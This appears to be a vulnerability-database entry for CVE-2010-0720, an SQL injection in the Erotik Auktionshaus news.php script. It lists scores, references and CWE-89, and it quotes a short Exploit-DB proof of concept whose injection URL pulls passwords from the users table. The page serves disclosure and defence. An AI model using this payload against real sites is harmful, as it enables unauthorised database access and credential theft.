CVE-2010-0720
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in news.php in Erotik Auktionshaus allows remote attackers to execute arbitrary SQL commands via the id parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Erotik Auktionshaus - 'news.php' SQL Injection
########################################################################
##Erotik Auktionshaus SQL Injection news.php ##
########################################################################
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
##########################################################################
#Script: Erotik Auktionshaus news.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ buy this script ] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
#Price: [ Commercial License EUR 149.00 โฌ #
#DEMO : http://xmedien.e-ee.de/auktion-e/ #
#############################################################################
#http://server/news.php?id=-1+union+select+1,2,password,4,5+from+users+--#
#############################################################################
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| systemsoftware | erotik_auktionshaus | | |
References
- http://4004securityproject.wordpress.com/2009/10/21/erotik-auktionshaus-sql-injection-news-php/
- http://packetstormsecurity.org/1002-exploits/erotik-sql.txt
- http://secunia.com/advisories/38614
- http://www.exploit-db.com/exploits/11489
- http://www.osvdb.org/62369
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56330
- http://4004securityproject.wordpress.com/2009/10/21/erotik-auktionshaus-sql-injection-news-php/
- http://packetstormsecurity.org/1002-exploits/erotik-sql.txt
- http://secunia.com/advisories/38614
- http://www.exploit-db.com/exploits/11489
- http://www.osvdb.org/62369
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56330
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.